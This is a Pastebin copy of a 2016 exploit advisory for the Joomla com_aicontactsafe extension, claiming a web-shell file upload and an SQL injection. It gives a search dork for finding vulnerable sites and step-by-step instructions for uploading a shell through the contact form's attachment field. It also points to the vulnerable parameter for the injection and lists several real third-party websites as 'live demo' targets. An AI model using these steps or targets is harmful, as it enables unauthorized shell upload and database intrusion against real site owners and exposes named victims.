SHARE
TWEET

Joomla com_aicontactsafe Arbitrary File Upload / SQL injecti

a guest Jul 20th, 2016 920 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ######################
  2. # Exploit Title : Joomla com_aicontactsafe Arbitrary File Upload / SQL injection Vulnerability
  3. # Exploit Author : D.R.S Dz Team
  4. # Dork : inurl:index.php?option=com_aicontactsafe
  5. # Software link : http://www.algisinfo.com/en/download/category/1-free-extensions.html
  6. # Vendor Homepage : http://www.algisinfo.com/
  7. # version : 2.0.20
  8. # Tested on: [ Windows]
  9. # skype:xbadgirl21
  10. # Date: 2016/07/18
  11. # video Proof : https://youtu.be/PdDmThHGVz8
  12. ######################
  13. # [+] FILE UPLOAD :
  14. ######################
  15. ######################
  16. # [+] DESCRIPTION :
  17. ######################
  18. # [+] aiContactSafe is An AJAX driven component to place a contact form anywhere on your web page
  19. # [+] with any number of custom fields of different types, including attachments.
  20. # [+] and an Shell Upload and SQLi has been Detected in this component
  21. ######################
  22. # [+] PoC :
  23. ######################
  24. # 1.- SELECT A WEBSITE FROM THE DORK ABOVE
  25. # 2.- http://localhost/site/index.php?option=com_aicontactsafe
  26. # 3.- check this Directory if you have Access to it : media/aicontactsafe/attachments
  27. # 4.- Just Upload your Shell or Txt or Image to Upload Field
  28. # 5.- Shell Directory : media/aicontactsafe/attachments/[RANDOME_NUM]Evi!l.php or the extension uploaded
  29. # Ex : http://malmoskyttegille.se/media/aicontactsafe/attachments/x_415.txt
  30. ######################
  31. # [+] Live Demo:
  32. ######################
  33. # http://malmoskyttegille.se/index.php?option=com_aicontactsafe
  34. ######################
  35. # [+] SQL injection:
  36. ######################
  37. # PoC :
  38. # http://www.site.com/index.php?option=com_aicontactsafe&field=1
  39. # AdminPanel :
  40. # http://www.site.com/administrator
  41. ######################
  42. # [+] Live Demo:
  43. ######################
  44. # http://www.esbrasil.net/portal/index.php?option=com_aicontactsafe&field=1
  45. # http://www.rustyspic-a-part.com/index.php?option=com_aicontactsafe&field=1
  46. ######################
  47. # Discovered by : xBADGIRL21
  48. # Greetz : All Mauritanien Hackers - NoWhere
  49. ######################
  50.  
  51. #  0day.today [2016-07-20]  #
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top